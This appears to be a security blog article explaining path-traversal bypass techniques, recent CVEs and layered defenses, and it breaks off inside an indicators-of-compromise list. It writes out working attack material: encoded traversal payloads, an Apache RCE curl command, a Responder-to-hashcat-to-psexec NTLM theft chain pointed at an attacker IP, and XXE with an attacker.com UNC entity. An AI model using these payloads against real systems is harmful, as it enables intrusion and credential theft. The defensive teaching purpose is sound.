An Old Story That Never Gets Old: Path Traversal and Capital One's 106 Million Customers

TL;DR

Path traversal rose 85% in closed-source applications (2023-2024) and has contributed to breaches affecting 106 million customers and costing hundreds of millions of USD, yet it is still underrated. This article helps security teams understand modern bypass techniques and the critical CVEs of 2023-2025, and roll out layered defenses within the week.

OPENING – WHEN A "BASIC BUG" BECOMES A BILLION-DOLLAR NIGHTMARE

Last month a colleague asked me: "Path traversal? That ../ bug every second-year student knows?" I nodded, then pushed a report over to him: Capital One spent $100 million handling a breach that affected 106 million customers; Fortinet FortiOS was exploited for six years to deploy ransomware; WinRAR landed on the CISA KEV list in August 2025 because it was being exploited in the wild. He went quiet.

The dark truth is that path traversal is not "basic" at all. It grew 85% in closed-source apps from 2023 to 2024, accounts for 3.5% of all vulnerabilities, and ranks 8th in MITRE's CWE Top 25. After more than 20 years it is still a favorite entry ticket for ransomware gangs (64% of VPN vulnerabilities lead to ransomware), APT groups, and... bug bounty hunters earning $5,000–$12,000 per finding.

So why? Because behind the simple ../ sequence lies a maze of encodings: double URL encoding, Unicode U+002E, overlong UTF-8 %c0%af, null byte %00, the Windows backslash \, UNC paths such as \\attacker\share, and even the reserved device names CON/PRN on Windows. Because mobile has ContentProvider (90%+ of Android apps are affected, according to Oversecured), Python has os.path.join(), which "swallows the base path" when it meets an absolute path, and CVE-2007-4559 in tarfile affects 350,000+ projects, yet for years the Python team treated it as "designed behavior" rather than a bug to patch.

1. Modern Path Traversal: Far Beyond `../` – Welcome to the Encoding Maze

Suppose you write a simple validation like this:

filename = request.args.get('file')
if '../' in filename or '..' in filename:
    return "Nice try, hacker!"
return send_file(f"/var/www/files/{filename}")

Looks safe? Wrong. This is where the game really starts.

A. URL Encoding – The First Layer of Disguise

How it works: servers and frameworks decode URL-encoded characters, but not always before the validation code runs. The character . (dot) is ASCII 0x2E and encodes to %2e. The character / (slash) is ASCII 0x2F and encodes to %2f.

Attack flow:

1. Attacker sends: GET /download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
2. Validation runs on the raw value: "../" in filename? → False (at check time the value is still %2e%2e%2f)
3. A later layer (the application or the server) decodes: %2e%2e%2f → ../, giving ../../../etc/passwd
4. The file system resolves → /var/www/files/../../../etc/passwd → /etc/passwd

Real-world payload:

GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1
Host: vulnerable-app.com

Why does it bypass? The validation looks for the literal string ../, but at that point the payload is still %2e%2e%2f, a different string, so the filter does not match. By the time the path reaches the file system, the framework or server has decoded it back to ../.
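
The check-before-decode ordering problem can be reproduced in a few lines. This is a minimal sketch, not the code of any particular framework: the helper names naive_filter and decode_then_filter are made up for illustration, and the only library call is the standard urllib.parse.unquote.

```python
from urllib.parse import unquote


def naive_filter(raw_value: str) -> bool:
    """Return True when the value looks safe to a literal '../' check."""
    return "../" not in raw_value and ".." not in raw_value


def decode_then_filter(raw_value: str) -> bool:
    """Decode first, then apply the same literal check to what the file API will see."""
    return naive_filter(unquote(raw_value))


payload = "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

print(naive_filter(payload))        # literal check on the still-encoded value
print(unquote(payload))             # what a later decoding step produces
print(decode_then_filter(payload))  # same check, applied after decoding
```

The point of the sketch is ordering: the same literal check gives opposite answers depending on whether it runs before or after decoding, so validation should always look at the fully decoded value.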

B. Double URL Encoding – When the Web Stack Decodes Twice

How it works: many web architectures have two decoding layers. For example, a reverse proxy (Nginx/Apache) decodes once and the application backend (Tomcat/Flask) decodes a second time. Or a WAF decodes once to inspect the request and the app decodes again.

Attack flow:

1. Encode `.` → %2e
2. Encode a second time: % → %25 → result: %252e
3. Full payload: %252e%252e%252f (equivalent to ../ after two rounds of decoding)

Layer 1 (WAF/Reverse Proxy):
   %252e%252e%252f → decode → %2e%2e%2f (still not ../)
   Validation: "../" in "%2e%2e%2f"? → False ✅ Pass

Layer 2 (Application):
   %2e%2e%2f → decode → ../ (now a traversal sequence)
   File system: /var/www/files/../ → /var/www/ → escape!
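
The two layers can be simulated to see where the check goes blind. This is a sketch under stated assumptions: waf_allows and backend_path are hypothetical stand-ins for a WAF that decodes once before checking and a backend that decodes the forwarded value again; real products differ in the details.

```python
from urllib.parse import unquote


def waf_allows(value: str) -> bool:
    """Layer 1 (hypothetical WAF): decode once, then look for a literal '../'."""
    return "../" not in unquote(value)


def backend_path(value: str) -> str:
    """Layer 2 (hypothetical backend): decodes the value the WAF already decoded once."""
    return unquote(unquote(value))


payload = "%252e%252e%252f"

print(waf_allows(payload))    # the WAF sees %2e%2e%2f and lets it through
print(backend_path(payload))  # the backend ends up with a traversal sequence
```

Any layer that validates after fewer decoding rounds than the layers behind it will perform is checking a different string than the one that reaches the file system.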

Apache CVE-2021-41773 – a real-world case study:

Apache 2.4.49 introduced the function ap_normalize_path() to improve performance
The function mishandled the sequence .%2e/ (a literal dot followed by an encoded dot)
Payload: GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Or: GET /icons/.%2e/.%2e/.%2e/etc/passwd
Result: 112,000 servers exposed, public exploits within 24 hours, RCE when mod_cgi is enabled
Note: this payload is partially encoded rather than double-encoded; the true double-encoding variant arrived with the follow-up CVE-2021-42013, which bypassed the 2.4.50 fix by writing the dot as %%32%65

Real-world RCE payload:

curl --path-as-is \
  'http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' \
  -d 'echo;id'
# Output: uid=1(daemon) gid=1(daemon) groups=1(daemon)

In plain terms: it is like passing through two checkpoints. At the first one you wear ordinary clothes and get scanned, so the guards see "a normal visitor". The second checkpoint does not scan again, and by then you have changed into the ninja outfit.

C. Unicode 16-bit & Overlong UTF-8 – Encoding Trickery

Unicode 16-bit (legacy IIS 5.0):

Encoding: %u002e (dot), %u2215 (division slash ∕, which IIS mistakenly treats as /)
Payload: %u002e%u002e%u2215 → IIS decodes it to ../
Typical validation only checks ASCII encodings and does not handle Unicode

Overlong UTF-8 (Microsoft IIS MS00-078):

Standard UTF-8:

The character / (ASCII 0x2F) → UTF-8: 0x2F (1 byte)

Overlong UTF-8 (violates the standard):

The same character / encoded in 2 bytes: 0xC0 0xAF → %c0%af
Or in 3 bytes: 0xE0 0x80 0xAF → %e0%80%af

Why does it work?

Validation: checks for the literal string ../ or %2f → no match against %c0%af
File handling (old Windows/IIS): the lenient UTF-8 decoder still interprets 0xC0 0xAF as /
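
A strict decoder is the defense against overlong forms. As a minimal sketch (the helper name is_malformed_utf8 is an illustrative assumption), Python's built-in UTF-8 codec in strict mode refuses both overlong encodings of the slash, which is the behavior the old IIS decoder lacked:

```python
from urllib.parse import unquote_to_bytes


def is_malformed_utf8(raw: bytes) -> bool:
    """Return True when the bytes are rejected by a strict UTF-8 decoder."""
    try:
        raw.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        return True
    return False


two_byte = unquote_to_bytes("%c0%af")       # overlong 2-byte form of '/'
three_byte = unquote_to_bytes("%e0%80%af")  # overlong 3-byte form of '/'

print(is_malformed_utf8(two_byte))
print(is_malformed_utf8(three_byte))
print(is_malformed_utf8(b"/"))
```

Rejecting the request outright when decoding fails is safer than substituting replacement characters and continuing.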

Classic IIS payload:

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.1

Result: remote command execution on IIS 4.0/5.0.

In plain terms: it is like writing "DAO" in an odd Unicode font, ᗪᗩO. The human eye (validation) sees something different from DAO and lets it pass, but the file reader (a lenient UTF-8 decoder) still reads it as "DAO".

D. Null Byte Injection – When the C String Terminator Wrecks Everything

How it works:

C/C++ strings end with a null byte (\0 or 0x00)
PHP < 5.3.4 and many older languages use C-based file APIs
When such an API meets a null byte, the string is truncated there

Attack scenario:

Application logic:

<?php
$file = $_GET['file'];
// Validation: only allow .pdf
if (!preg_match('/\.pdf$/', $file)) {
    die("Only PDF allowed!");
}
// Download file
readfile("/var/www/uploads/" . $file);
?>

Attack flow:

1. Payload: ../../../etc/passwd%00.pdf
2. Validation regex: does the string end with '.pdf'? → True ✅
   (because the full string is: ../../../etc/passwd\0.pdf)
3. Validation passes
4. readfile() calls the C API fopen():
   → fopen() reads up to the null byte → sees only '../../../etc/passwd'
   → the trailing '.pdf' is ignored
5. File that gets read: /etc/passwd
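
The mismatch between the extension check and the truncated path disappears once NUL bytes are rejected before any other validation. A minimal sketch, with reject_nul and has_pdf_extension as hypothetical helper names:

```python
from urllib.parse import unquote


def reject_nul(filename: str) -> str:
    """Refuse any filename carrying a NUL byte before other checks run."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    return filename


def has_pdf_extension(filename: str) -> bool:
    """Extension check that only runs on NUL-free input."""
    return reject_nul(filename).lower().endswith(".pdf")


decoded = unquote("../../../etc/passwd%00.pdf")

try:
    has_pdf_extension(decoded)
    blocked = False
except ValueError:
    blocked = True

print(blocked)
```

Modern runtimes often do this themselves (CPython's open() raises ValueError on an embedded null byte), but legacy stacks and native extensions may not, so an explicit check is cheap insurance.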

Real-world payload:

GET /download.php?file=../../../etc/passwd%00.pdf HTTP/1.1

Scope of impact:

PHP < 5.3.4 (2010)
Perl (legacy CGI)
Embedded systems/IoT firmware (many devices still run old code)

In plain terms: you inspect someone's paperwork and see "Engineering certificate.pdf" at the end, so you approve it. But there is an invisible character (the null byte) in the middle, and the machine reads only the part before it: "Fake degree". You have been fooled.

E. Windows-Specific Bypasses – Operating System Specialties

1. Backslash \ in place of forward slash /:

Windows accepts both \ and / as path separators
Many validations filter only / → bypass with \

# Vulnerable code
if '/' in filename:
    abort(403)
send_file(BASE + filename)

# Payload: ..\..\..\windows\win.ini
# Validation passes, but Windows resolves it to C:\windows\win.ini

2. Case-Insensitive Filesystem:

/etc/passwd   (Linux: case-sensitive)
c:\WiNdOwS\sYsTeM32\cOnFiG\sAm  (Windows still finds it)

3. Trailing Dots & Spaces:

Windows automatically strips trailing dots and spaces
file.txt = file.txt. = "file.txt " (trailing space) = file.txt...

Exploit:

Denylist check: filename not in ['web.config']
Payload: web.config.......... → string comparison passes → Windows strips the dots and opens web.config
(An exact-match allowlist such as ['report.pdf', 'data.csv'] would reject this payload; the trick works against denylists and extension checks.)

4. Reserved Device Names (Node.js CVE-2025-27210):

Windows has special device names: CON, PRN, AUX, NUL, COM1-9, LPT1-9
When accessed, Windows treats them as devices, not files

// Node.js path.join() bug
const path = require('path');
path.join('C:\\users\\public', 'CON', '..\\..\\..\\windows\\system32')
// Expected: C:\users\public\CON\..\..\..\windows\system32
// Actual: CON gets special handling on Windows → validation is bypassed
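
The four Windows quirks above (separators, trailing dots and spaces, reserved device names, and the colon used by drive letters and streams) can be checked per path component. The following is a sketch only: check_windows_component is a hypothetical helper, not part of Node.js or any framework, and the rule set is deliberately stricter than Windows itself.

```python
RESERVED = {
    "CON", "PRN", "AUX", "NUL",
    *(f"COM{i}" for i in range(1, 10)),
    *(f"LPT{i}" for i in range(1, 10)),
}


def check_windows_component(name: str) -> str:
    """Validate a single file name (one path component) against Windows naming quirks."""
    if not name or name in {".", ".."}:
        raise ValueError("empty or relative component")
    if "/" in name or "\\" in name or ":" in name:
        raise ValueError("separator, drive letter, or stream marker in component")
    if name != name.rstrip(". "):
        raise ValueError("trailing dot or space")
    # Windows matches device names case-insensitively and ignores the extension
    stem = name.split(".", 1)[0].upper()
    if stem in RESERVED:
        raise ValueError("reserved device name")
    return name


for candidate in ["report.pdf", "report.pdf....", "con.txt", "..\\..\\windows\\win.ini"]:
    try:
        check_windows_component(candidate)
        print(candidate, "accepted")
    except ValueError as exc:
        print(candidate, "rejected:", exc)
```

Validating each component separately, and only then joining them under a fixed base directory, avoids having to reason about how the operating system will reinterpret the full string.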

5. UNC Path (Universal Naming Convention) – NTLM Credential Theft

What a UNC path is:

Format: \\server\share\path\file.txt
Used to access network file shares over the SMB protocol (Server Message Block)
Legitimate example: \\file-server\department\reports\Q4.pdf

Why does Windows authenticate automatically?

When a Windows application (web server, service...) handles a UNC path:

UNC detection: it recognizes the \\server\... format
SMB connection: it automatically opens an SMB connection to the server
NTLM authentication: Windows automatically sends the credentials of the running process to authenticate
- If IIS runs under the service account COMPANY\webserver$ → that account's credentials are sent
- If the app runs in a user context → that user's credentials are sent

This is NOT a bug but a Windows feature: accessing a network share requires authentication. Attackers abuse it to steal hashes.

Detailed Attack Flow:

Step 1: Attacker sets up a malicious SMB server

Using the tool Responder (the most common choice in pentests):

# Attacker machine (IP: 203.0.113.50)
sudo responder -I eth0 -v

# Responder listens on:
# - SMB (445/tcp)
# - HTTP (80/tcp)
# - LLMNR, NBT-NS, mDNS (name resolution poisoning)

Responder poses as a legitimate SMB server but records every authentication attempt.

Step 2: Inject the UNC path into the vulnerable application

Suppose the web app has a path traversal vulnerability:

# Vulnerable Flask app
@app.route('/download')
def download():
    filename = request.args.get('file')
    # No validation → UNC paths are accepted
    return send_file(filename)

Payload:

GET /download?file=\\203.0.113.50\share\report.pdf HTTP/1.1
Host: vulnerable-company.com

Or in an upload form:

<!-- User uploads a file with a malicious filename -->
<input type="file" name="logo" />
<!-- Attacker changes the filename to a UNC path -->

Step 3: Windows handles the UNC path → authenticates automatically

1. Application receives the parameter: \\203.0.113.50\share\report.pdf
2. Python send_file() → Windows API CreateFile()
3. Windows recognizes the UNC path → initiates an SMB connection
4. SMB Client (victim server) → SMB Server (attacker 203.0.113.50)
5. SMB handshake:

   Victim → Attacker: SMB Negotiate Protocol Request
   Attacker → Victim: SMB Negotiate Protocol Response (requests NTLM auth)

   Victim → Attacker: SMB Session Setup (sends NTLM authentication)
   ├─ Username: COMPANY\webserver$
   ├─ Domain: COMPANY
   └─ NTLMv2 Response Hash:
      - Challenge from attacker: 1122334455667788
      - Response: hash(NT hash + challenge)

NTLM Authentication Flow:

[Victim Server]                    [Attacker SMB Server]
       |                                     |
       |-- NEGOTIATE_PROTOCOL_REQ -------->  |
       |<-------- CHALLENGE (random) --------|  (attacker sends an 8-byte challenge)
       |                                     |
       |-- AUTHENTICATE_REQ --------------->  |  (victim hashes password + challenge → response)
       |   Username: COMPANY\webserver$      |
       |   Domain: COMPANY                   |
       |   NTLMv2-Response: [hash data]      |
       |                                     |
       |                         ✅ Attacker captures the hash!

The captured hash has this format:

webserver$::COMPANY:1122334455667788:hash_part1:hash_part2

This is an NTLMv2 response, not a plaintext password, but it can be cracked offline to recover the password.

Step 4: Responder captures the hash

Output on the attacker's terminal:

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.1.100
[SMB] NTLMv2-SSP Username : COMPANY\webserver$
[SMB] NTLMv2-SSP Hash     : webserver$::COMPANY:1122334455667788:A4F2D9B31C8E6745:0101000000000000C0653150DE09D201B4E5A7FB8934B7CA000000000200080053004D0042003100...

[+] Hash saved to /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.100.txt

Step 5: Crack the hash offline with Hashcat

# Copy the hash into a file
echo 'webserver$::COMPANY:1122...:A4F2...' > hash.txt

# Crack with hashcat (mode 5600 = NTLMv2)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

# Or use rules to improve the hit rate
hashcat -m 5600 hash.txt rockyou.txt -r best64.rule

# Output when cracking succeeds:
webserver$::COMPANY:1122...:A4F2...:P@ssw0rd2024!

# The password is: P@ssw0rd2024!

Dictionary attacks often succeed because:

Service accounts often have weak passwords (e.g. CompanyName123!, Service2024)
User passwords: Summer2024!, Welcome123, Password1!
Many companies follow a password pattern: Season+Year+!

Caveat: account names ending in $ are normally machine accounts, whose passwords are long and randomly generated by Windows, so cracking is realistic mainly for human-chosen passwords on user and manually managed service accounts.

Step 6: Post-Exploitation

Once the password is known:

A. Lateral Movement:

# Use the credential to reach other machines in the domain
crackmapexec smb 192.168.1.0/24 -u webserver$ -p 'P@ssw0rd2024!' --shares

# Or use PSExec for a remote shell
psexec.py COMPANY/webserver$:'P@ssw0rd2024!'@192.168.1.100

# Shell with the service account's privileges
C:\Windows\system32>

B. Privilege Escalation:

If the service account is highly privileged (Domain Admin, Local Admin) → the whole environment is compromised
Dump more credentials from LSASS memory
Kerberoasting to obtain further service accounts

C. Persistence:

Create a backdoor user
Install a scheduled task
Golden ticket attack (if Domain Admin is obtained)

Real-World Attack Scenarios:

Scenario 1: File Upload

1. Web app allows uploading an avatar/logo
2. Attacker uploads a file named: \\attacker.com\x\avatar.png
3. App processes the filename → Windows opens an SMB connection
4. Credentials leaked

Scenario 2: PDF Generator

# Vulnerable code: the user controls the output path
pdf_path = request.form['output_path']
generate_pdf(pdf_path)  # The function calls the Windows file API

# Payload:
POST /generate-report
output_path=\\203.0.113.50\reports\output.pdf

# Result: NTLM hash leaked

Scenario 3: Image Processing

<?php
$image_url = $_GET['url'];
// Vulnerable: file_get_contents accepts a UNC path
$data = file_get_contents($image_url);
?>

# Payload:
GET /resize?url=\\attacker.com\images\logo.png

Scenario 4: XXE + UNC (XML External Entity)

<!-- Upload XML with an external entity -->
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file://\\attacker.com\share\test.txt">
]>
<root>&xxe;</root>

<!-- Windows XML parser → SMB connection → NTLM leak -->

Why Is This Attack Dangerous?

Silent credential theft: the victim never notices the credentials leaking
No user interaction: the victim does not need to click a link or type a password
Service account = high privilege: these accounts usually hold more rights than ordinary users
Often passes firewalls: many corporate networks do not block outbound SMB
Bypasses MFA: NTLM authentication has no MFA step; a username and password are enough

Defense Mechanisms:

1. Firewall Rules (the most important control!)

# Allow SMB only inside the internal network, then drop every other outbound SMB connection
# (rule order matters: iptables stops at the first match, so ACCEPT must come before DROP)
iptables -A OUTPUT -p tcp --dport 445 -d 10.0.0.0/8 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 445 -j DROP

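2. Code Validation

import os
from pathlib import Path

# Directory that served files must stay inside (adjust to your deployment)
BASE_DIR = Path('/var/www/files').resolve()

def is_safe_path(user_input):
    # 1. Reject UNC paths (\\server\share or //server/share)
    if user_input.startswith('\\\\') or user_input.startswith('//'):
        raise ValueError("UNC paths not allowed")

    # 2. Reject absolute paths
    if os.path.isabs(user_input):
        raise ValueError("Absolute paths not allowed")

    # 3. Containment check: resolve the joined path, then confirm it is still under BASE_DIR
    safe_path = (BASE_DIR / user_input).resolve()

    # is_relative_to (Python 3.9+) compares path components, so /var/www/files_evil
    # is not mistaken for a child of /var/www/files the way str.startswith would be
    if not safe_path.is_relative_to(BASE_DIR):
        raise ValueError("Path traversal detected")

    return safe_path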

3. Windows Registry Hardening

# Deny outbound NTLM authentication to remote servers
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]
"RestrictSendingNTLMTraffic"=dword:00000002

# Send NTLMv2 responses only; refuse LM and NTLM
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000005

4. Network Segmentation

Web servers must not be allowed outbound SMB to the internet
Allow SMB only to specific file servers (IP allowlist)

5. Monitoring & Detection

# SIEM alerts for:
- Outbound SMB connections (port 445) from web servers
- NTLM authentication to external IPs
- Failed authentication attempts with service accounts

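# Sigma rule (sketch; assumes Sysmon network-connection events are collected):
title: Suspicious Outbound SMB Connection
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    DestinationPort: 445
    Initiated: 'true'
  filter_internal:
    DestinationIp|cidr: '10.0.0.0/8'  # internal range, adjust to your network
  condition: selection and not filter_internal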
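
The same detection idea, outbound port 445 to anything that is not an internal range, can be prototyped before it is encoded in a SIEM. This sketch assumes connection events have already been parsed into a destination IP and port; is_suspicious_smb and the INTERNAL_NETS list are illustrative assumptions, to be adjusted to the real network plan.

```python
import ipaddress

# Internal ranges considered legitimate SMB destinations (assumption: RFC 1918 space)
INTERNAL_NETS = [
    ipaddress.ip_network(cidr)
    for cidr in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def is_suspicious_smb(dest_ip: str, dest_port: int) -> bool:
    """Flag SMB connections whose destination is outside the internal ranges."""
    if dest_port != 445:
        return False
    address = ipaddress.ip_address(dest_ip)
    return not any(address in network for network in INTERNAL_NETS)


events = [("203.0.113.50", 445), ("10.1.2.3", 445), ("203.0.113.50", 443)]
for ip, port in events:
    print(ip, port, is_suspicious_smb(ip, port))
```

Explicit network lists are used here instead of the is_private attribute because that attribute also covers documentation and other special-purpose ranges, which would hide the example attacker address used in this article.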

Imagine you carry a smart key (your Windows credentials) in your pocket at all times. Whenever you reach a door with a "File Server" sign on it (real or fake), the key flies out by itself and tries the lock.

The hacker builds a fake door (a malicious SMB server), hangs up a "File Server" sign, and injects the fake door's address into your app. Your app knocks on the door → the key flies out → the hacker copies the key's shape (the NTLM hash) → goes home and forges the real key (cracks the hash) → has the password.

This is NOT a Windows bug but a legitimate feature being abused. It is as if you had set up "open automatically whenever you see a File Server sign": convenient, but dangerous when you cannot tell a real door from a fake one.

F. Conclusion: Multi-Layer Bypasses in Practice

In pentests and bug bounty work, attackers usually combine several techniques:

Example combo attack:

# Layer 1: Double encoding
# Layer 2: Backslash (Windows)
# Layer 3: Null byte

GET /api/download?file=%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cconfig%255csam%00.pdf

Decode pass 1: %2e%2e%5c%2e%2e%5cwindows%5csystem32%5cconfig%5csam\0.pdf
Decode pass 2: ..\..\windows\system32\config\sam\0.pdf
File API read: ..\..\windows\system32\config\sam (truncated at the null byte)
Result: the SAM database (Windows password hashes) is targeted

The defense-bypass checklist in the attacker's head:

✅ Filter on ../? → Use %2e%2e%2f
✅ Filter on %2e? → Use %252e (double)
✅ Only Linux paths expected? → Use \ on Windows
✅ Extension check for .pdf? → Add %00 before the extension
✅ WAF blocking? → Mix encodings (%2e + . + %5c)

In plain terms: imagine you forbid people from using the back door (filter ../). But:

He wears camouflage (URL encoding)
Speaks a foreign language (Unicode/UTF-8)
Carries two outfits and changes halfway (double encoding)
Uses the side door nobody watches (backslash on Windows)
Carries forged papers with an invisible stamp (null byte)

Your security check recognizes none of these disguises → the door opens by itself.
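
One way to counter stacked disguises is to canonicalize first and validate last. The sketch below is an illustration under stated assumptions rather than a complete defense: canonicalize is a hypothetical helper that decodes until the value is stable, rejects NUL bytes, treats both slash styles as separators, and refuses absolute paths, drive or stream colons, and any .. component.

```python
from pathlib import PurePosixPath
from urllib.parse import unquote


def canonicalize(raw: str, max_rounds: int = 5) -> str:
    """Return a normalized relative path, or raise ValueError for suspicious input."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break  # value is stable, no encoding layers left
        value = decoded
    else:
        raise ValueError("too many encoding layers")
    if "\x00" in value:
        raise ValueError("NUL byte")
    value = value.replace("\\", "/")  # treat both separators alike
    if value.startswith("/") or ":" in value:
        raise ValueError("absolute path, drive letter, or stream marker")
    if ".." in PurePosixPath(value).parts:
        raise ValueError("traversal component")
    return value


combo = "%252e%252e%255c%252e%252e%255cwindows%255csystem32%255cconfig%255csam%00.pdf"
try:
    canonicalize(combo)
except ValueError as exc:
    print("rejected:", exc)

print(canonicalize("reports/q4.pdf"))
```

The result should still be joined to a fixed base directory and checked for containment; canonicalization narrows the input, it does not replace the final path check.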

2. CVEs 2023–2025: When the "Hello World of Hacking" Scores CVSS 9.8

Since 2023 there have been 11 major CVEs involving path traversal, 4 of them rated critical (≥9.0). A few highlights:

2023:

CVE-2023-50164 (Apache Struts 2) – CVSS 9.8, abuses uploadFileName to upload a JSP webshell → RCE
CVE-2023-32235 (Ghost CMS) – no auth required, reads files via /assets/built/../..//, exposing env variables to the internet

2024:

CVE-2024-38816 & CVE-2024-38819 (Spring Framework) – high severity, double URL encoding bypass, reads any file the Spring process can reach
CVE-2024-13059 (AnythingLLM) – AI platforms are affected too: the multer library mishandles non-ASCII filenames, so an attacker uploads ../../malicious.sh → RCE

2025:

CVE-2025-42937 (SAP Print Service) – CVSS 9.8, network accessible, zero privileges required, full CIA compromise
CVE-2025-27210 (Node.js) – Windows reserved names CON/PRN/AUX combined with traversal bypass path.join() and path.normalize()
CVE-2025-8088 (WinRAR) – exploited in the wild; CISA required patching by 2 September 2025

Deep Dive: CVE-2025-8088 WinRAR – A Zero-Day Sold for $80,000 on the Dark Web

Timeline & CISA Response:

18 July 2025: ESET detects the zero-day being exploited in the wild
30 July 2025: WinRAR 7.13 is released, quietly fixing the bug
12 August 2025: CISA adds it to the Known Exploited Vulnerabilities (KEV) catalog
Deadline: 2 September 2025 – federal agencies must patch or stop using the product
CVSS: 8.4 (High severity)
Affected: WinRAR < 7.13 (Windows only; Linux/Android are not affected)

Why is it dangerous?

350 million WinRAR users worldwide
The only interaction required is extracting the malicious archive; nothing looks wrong to the victim
The APT group RomCom (Russia-aligned, aka Storm-0978) used it from 18 to 21 July 2025
An exploit was offered on the dark web for $80,000
Paper Werewolf (another threat actor) used it as well → several groups hold the exploit

Technical Mechanism: Alternate Data Streams (ADS) Exploitation

What ADS is:

Windows has supported Alternate Data Streams since NTFS
Every file can carry several hidden "streams" alongside its main data
Syntax: filename.txt:stream_name:$DATA
Example: resume.pdf:malware.exe:$DATA → an executable stored in a hidden stream of the PDF

The flaw in WinRAR:

WinRAR processed ADS entries in an archive without validating their paths, which lets an attacker:

Craft a RAR file containing ADS entries with traversal sequences in the stream name
On extraction → WinRAR writes files to arbitrary locations through ADS path manipulation
Common target: the Windows Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\)
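
The missing validation can be illustrated with a generic entry-name check of the kind an extractor would run before writing anything. This is a hedged sketch, not WinRAR's actual fix: is_safe_member is a hypothetical helper, and it uses pathlib.PureWindowsPath so that Windows path rules are applied regardless of the platform the check runs on.

```python
from pathlib import PureWindowsPath


def is_safe_member(name: str) -> bool:
    """Return True if an archive entry name stays inside the extraction folder."""
    if ":" in name:
        # Covers drive letters (C:\...) and NTFS stream syntax (file:stream:$DATA)
        return False
    path = PureWindowsPath(name)
    if path.anchor:
        # Rooted paths (\windows) and UNC paths (\\server\share\...)
        return False
    return ".." not in path.parts


entries = [
    "resume.pdf",
    "docs/resume.pdf",
    "resume.pdf:..\\..\\Startup\\evil.exe:$DATA",
    "..\\..\\evil.exe",
    "\\\\attacker\\share\\x",
]
for entry in entries:
    print(entry, is_safe_member(entry))
```

An extractor that rejects the whole archive on the first unsafe entry is easier to reason about than one that silently skips entries.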

Detailed Attack Flow:

Step 1: Attacker crafts a malicious RAR

Archive structure (as seen from outside):

resume.rar
└── resume.pdf  (the only file the user sees)

But inside there are several hidden ADS entries (the traversal depth shown is illustrative; the depth that works depends on where the archive is extracted):

resume.rar (internal structure)
├── resume.pdf (benign file, visible to the user)
├── resume.pdf:..\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe:$DATA
├── resume.pdf:..\..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\loader.dll:$DATA
└── resume.pdf:..\..\..\..\Users\Public\Documents\backdoor.vbs:$DATA

Step 2: Social engineering delivery

RomCom campaign (18-21 July 2025):

From: [email protected] (spoofed)
Subject: Job Application - Senior Security Engineer

Dear Hiring Manager,

Please find attached my resume for the Senior Security Engineer position.

Attachment: John_Smith_Resume.rar

Target sectors:

Financial institutions (Europe)
Manufacturing (Canada)
Defense contractors
Logistics companies

Step 3: Victim extracts the RAR

User action:
1. Download John_Smith_Resume.rar
2. Right-click → "Extract Here" or double-click
3. WinRAR extracts:
   - resume.pdf → Downloads\Extracted\resume.pdf ✅ (benign)
   - ADS paths → traverse out of the extraction folder!

Actual extraction:
C:\Users\Victim\Downloads\Extracted\resume.pdf (benign file)
C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe (malware!)
C:\Users\Victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\loader.dll
C:\Users\Public\Documents\backdoor.vbs

Step 4: Malware execution

Timeline:
T+0:    User extracts the RAR
T+1s:   evil.exe is written to the Startup folder (the victim sees nothing)
T+??:   User reboots or logs out and back in
T+boot: Windows automatically runs evil.exe from Startup
        → Backdoor established, often without an AV alert (a file in Startup looks "legitimate")

Step 5: Post-Exploitation

RomCom deployed malware:

SnipBot (custom backdoor): C2 communication, screenshot capture, keylogging
RustyClaw (info stealer): Browser cookies, saved passwords, crypto wallets
Mythic agent (post-exploitation framework): lateral movement, privilege escalation, data exfiltration

Paper Werewolf campaign:

Target: Russian organizations (domestic cybercrime)
Payload: Banking trojans, credential stealers
Purchased exploit from dark web vendor ($80,000)

Real-World Impact:

Victim distribution:

Financial: Banks, investment firms → credential theft → wire fraud
Manufacturing: IP theft, supply chain compromise
Defense: Classified data exfiltration, espionage
Logistics: Ransomware deployment via supply chain access

Detection challenges:

No UI warning: WinRAR does not show ADS entries when listing contents
AV bypass: malware dropped into the Startup folder looks "legitimate"
User trust: a .rar file from a "job applicant" raises no suspicion
Delayed execution: the malware only runs after a reboot → harder for forensics to trace

Proof of Concept (Concept Only – No Detailed Exploit)

Structure of a malicious RAR (for defensive understanding):

# Conceptual structure - NOT real exploit code
Archive contains:
- Visible file: "document.pdf"
- Hidden ADS:
  * Stream name: "..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"
  * Stream data: [malware binary]

When WinRAR extracts → writes to:
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Indicators of Compromise (IOCs):

File artifacts:
- Unexpected executables in Startup folder
- Recently modified files in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
- Extracted files carrying unexpected ADS (check the extraction folder with: dir /r)

Registry:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run (new entries)
- HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

Network:
